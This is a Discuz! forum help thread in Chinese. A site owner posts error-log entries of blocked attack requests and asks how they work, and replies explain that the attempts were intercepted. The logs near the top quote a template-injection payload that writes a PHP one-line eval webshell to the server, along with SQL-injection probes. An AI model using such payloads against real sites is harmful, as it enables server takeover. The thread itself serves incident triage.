12下一页
返回列表 发帖
查看: 14744|回复: 12

[求助] 论坛被上传一句话木马函数eval-1719

3

主题

20

回帖

31

积分

初学乍练

贡献
0 点
金币
7 个
发表于 2019-11-3 02:52:57 | 显示全部楼层 |阅读模式
十月份
<?PHP exit;?>        1572107794        <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        0a040e74e3b12d6c7c171c7bea2df37e        <b>User:</b> uid=0; IP=31.210.88.178; RIP:157.119.232.12 Request: /home.php?ac=plugin'&amp;id=saya_card:card'&quot;&amp;mod=spacecp'&amp;op=credit'
<?PHP exit;?>        1572108553        <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>home.php:0024 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        0a040e74e3b12d6c7c171c7bea2df37e        <b>User:</b> uid=0; IP=103.130.218.108; RIP:157.119.232.9 Request: /home.php?ac=plugin'&amp;id=saya_card:card'&quot;&amp;mod=spacecp'&amp;op=credit'
<?PHP exit;?>        1572551909        <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        e86a1b6a3998a55766370723968ce392        <b>User:</b> uid=0; IP=94.191.15.67; RIP:123.151.76.253 Request: /?a=fetch&amp;templateFile=public/index&amp;prefix=''&amp;content=&lt;php&gt;file_put_contents('hmseo.php','&lt;?php%20@eval($_POST[hm]);?&gt;hmseo')&lt;/php&gt;
十一月份
<?PHP exit;?>        1572630519        <b>您当前的访问请求当中含有非法字符,已经被系统拒绝</b><br><b>PHP:</b>index.php:0132 -> forum.php:0057 -> source/class/discuz/discuz_application.php:0071 -> source/class/discuz/discuz_application.php:0544 -> source/class/discuz/discuz_application.php:0360 -> source/function/function_core.php:0023 -> source/class/discuz/discuz_error.php:0024        e86a1b6a3998a55766370723968ce392        <b>User:</b> uid=0; IP=94.191.15.67; RIP:183.3.254.82 Request: /?a=fetch&amp;templateFile=public/index&amp;prefix=''&amp;content=&lt;php&gt;file_put_contents('hmseo.php','&lt;?php%20@eval($_POST[hm]);?&gt;hmseo')&lt;/php&gt;

这两天连续被人用同一种方法挂马了两次,虽然有用安全软件,没修复的话总感觉心里不踏实。
有没有大佬能看懂是如何挂马的?怎么修复?使用安全软件的Nginx防火墙的话怎么添加规则内容?是否都需要在过滤中添加?
问题有点多,再次拜谢大佬们了
QQ截图20191103024814.jpg
QQ截图20191103024854.jpg




我知道答案 回答被采纳将会获得1 贡献 已有12人回答
回复

使用道具 举报

15

主题

1794

回帖

2063

积分

应用开发者

discuz 老兵

贡献
8 点
金币
188 个
QQ
发表于 2019-11-4 09:52:00 | 显示全部楼层
木马问题不是在程序本身,而是服务器的权限, 是某种的木马伪装成图片 通过上传头像 帖子等方式就上传到你服务器上了,要命的是你服务器还允许执行,
单纯的清理木马没用的 要服务器的安全最主要
您可以加我QQ129820交谈,有偿服务,专业清理+安防


如果在日志里, 可以无视的

回复 支持 反对

使用道具 举报

18

主题

1896

回帖

2900

积分

应用开发者

贡献
57 点
金币
624 个
QQ
发表于 2019-11-4 13:38:27 | 显示全部楼层
dz日志里面 是已经拦截的 所以没传成功哦
无限星辰工作室  好集导航 免费API
服务Discuz建站|定制|小程序|APP定制|故障维修|搬家|运维|挂马清理|防护|性能优化|安全运维|
服务理念:专业 诚信 友好QQ842062626 服务
回复 支持 反对

使用道具 举报

12

主题

87

回帖

220

积分

应用开发者

贡献
1 点
金币
71 个
发表于 2019-11-4 18:36:04 | 显示全部楼层
被误拦截了, 你现在要做的就是关闭第三方安全软件, 否则论坛正常功能会被破坏
回复 支持 0 反对 1

使用道具 举报

3

主题

20

回帖

31

积分

初学乍练

贡献
0 点
金币
7 个
 楼主| 发表于 2019-11-4 22:13:53 | 显示全部楼层
crx349 发表于 2019-11-4 13:38
dz日志里面 是已经拦截的 所以没传成功哦

安全狗报毒了
回复 支持 反对

使用道具 举报

3

主题

20

回帖

31

积分

初学乍练

贡献
0 点
金币
7 个
 楼主| 发表于 2019-11-4 22:14:56 | 显示全部楼层
jiangchuankyo 发表于 2019-11-4 18:36
被误拦截了, 你现在要做的就是关闭第三方安全软件, 否则论坛正常功能会被破坏 ...

扯淡?????
回复 支持 反对

使用道具 举报

11

主题

177

回帖

228

积分

炉火纯青

贡献
0 点
金币
36 个
发表于 2019-11-4 22:24:41 | 显示全部楼层
这就是别人一个尝试  。然后记录了写入到了log里面。带某些特征字段  
一般都不用理会

不信你自己复制那段字段 加在自己域名后面 浏览器访问一次。一样报错 记录在后台 然后写入了log日志。
然后就安全狗报警了 其实没什么用
回复 支持 反对

使用道具 举报

18

主题

1896

回帖

2900

积分

应用开发者

贡献
57 点
金币
624 个
QQ
发表于 2019-11-5 11:46:13 | 显示全部楼层

安全狗 报毒 是log文件吧 如果是 那只是关键字触发防护规则哦
无限星辰工作室  好集导航 免费API
服务Discuz建站|定制|小程序|APP定制|故障维修|搬家|运维|挂马清理|防护|性能优化|安全运维|
服务理念:专业 诚信 友好QQ842062626 服务
回复 支持 反对

使用道具 举报

12

主题

87

回帖

220

积分

应用开发者

贡献
1 点
金币
71 个
发表于 2019-11-6 11:47:50 | 显示全部楼层

如果别人可以通过这种关键字符访问方式就能注入成功的话, 那是程序代码自身有了严重漏洞, 应该从修复漏洞代码入手, 据我所知DZ目前没有这种漏洞,

如果你安装一些第三方拦截软件的话, 它会不管三七二十一只要内容你有一些关键词字符就给别人误拦截访问了,
这样你的论坛很多正常功能也就被破坏了, 这种拦截行为自身和恶意程序又有何区别呢?
回复 支持 反对

使用道具 举报

3

主题

20

回帖

31

积分

初学乍练

贡献
0 点
金币
7 个
 楼主| 发表于 2019-11-12 16:32:24 | 显示全部楼层
citywar 发表于 2019-11-4 22:24
这就是别人一个尝试  。然后记录了写入到了log里面。带某些特征字段  
一般都不用理会

谢谢大佬解答
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

  • 关注公众号
  • 有偿服务微信
  • 有偿服务QQ

手机版|小黑屋|Discuz! 官方交流社区 ( 皖ICP备16010102号 |皖公网安备34010302002376号 )|网站地图|star

GMT+8, 2024-6-24 20:23 , Processed in 0.083010 second(s), 9 queries , Redis On.

Powered by Discuz! W1.0 Licensed

Cpoyright © 2001-2024 Discuz! Team.

关灯 在本版发帖
有偿服务QQ
有偿服务微信
返回顶部
快速回复 返回顶部 返回列表